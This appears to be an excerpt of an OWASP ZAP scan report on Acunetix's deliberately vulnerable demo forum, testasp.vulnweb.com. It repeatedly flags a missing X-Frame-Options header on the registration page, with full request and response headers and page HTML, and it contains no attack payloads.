Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:46 GMT Content-Length: 3554 |
Response Body - size: 3,554 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 372 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 3549 |
Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 372 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=1 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:39 GMT Content-Length: 3549 |
Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 372 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 3549 |
Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3550 |
Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3550 |
Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 509 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Cookie: ASPSESSIONIDASSBRCRC=FCLMIJFALIPFLHBOMHKNEOFN Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:03:37 GMT Content-Length: 3635 |
Response Body - size: 3,635 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
